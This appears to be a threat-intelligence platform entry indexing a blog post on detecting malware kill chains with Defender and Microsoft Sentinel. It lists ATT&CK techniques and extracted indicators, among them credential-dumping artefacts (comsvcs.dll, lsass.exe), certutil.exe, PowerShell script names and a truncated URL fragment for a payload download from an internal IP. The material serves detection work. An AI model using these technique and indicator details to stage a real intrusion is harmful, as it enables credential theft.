Detecting malware kill chains with Defender and Microsoft Sentinel
Tags
maec-delivery-vectors: Watering Hole
attack-pattern: Data Confluence - T1213.001 Credentials - T1589.001 Domains - T1583.001 Domains - T1584.001 Local Account - T1087.001 Local Account - T1136.001 Malware - T1587.001 Malware - T1588.001 Phishing - T1660 Phishing - T1566 Powershell - T1059.001 Rundll32 - T1218.011 Scheduled Task - T1053.005 Server - T1583.004 Server - T1584.004 Software - T1592.002 Credential Dumping - T1003 Powershell - T1086 Rundll32 - T1085 Scheduled Task - T1053
Show in Graph
Common Information
Type Value
UUID d6bf6785-1e7c-4e30-b241-61d2dd29623e
Fingerprint f2058a59eff75853
Analysis status DONE
Considered CTI value 0
Text language
Published Feb. 28, 2022, 8:51 p.m.
Added to db Sept. 26, 2022, 9:34 a.m.
Last updated Nov. 17, 2024, 10:40 p.m.
Headline Microsoft Sentinel 101
Title Detecting malware kill chains with Defender and Microsoft Sentinel
Detected Hints/Tags/Attributes 62/2/20
Source URLs
Redirection Url
Details Source https://learnsentinel.blog/2022/02/28/detecting-malware-kill-chains-with-defender-and-microsoft-sentinel/
URL Provider
Details Provider Source level domain
Details learnsentinel.blog learnsentinel.blog
Attributes
Details Type #Events CTI Value
Details Domain 1 
trustsecpro.com
Details Domain 12 
whatismyip.com
Details Domain 1 
confluence.novus.ua
Details File 62 
whoami.exe
Details File 13 
logs.dat
Details File 2126 
cmd.exe
Details File 1 
email.jpeg
Details File 2 
sys.tmp
Details File 2 
postgresql.exe
Details File 226 
certutil.exe
Details File 27 
c:\windows\system32\comsvcs.dll
Details File 1 
c:\asm\appdata\local\microsoft\windows\winupd.log
Details File 69 
comsvcs.dll
Details File 478 
lsass.exe
Details File 1 
text.ps1
Details File 1 
gp.ps1
Details File 2 
link.ps1
Details IPv4 1 
192.168.3.13
Details IPv4 1441 
127.0.0.1
Details Url 1 
http://192.168.3.13/email.jpeg’,’csidl_system_drive\temp\sys.tmp1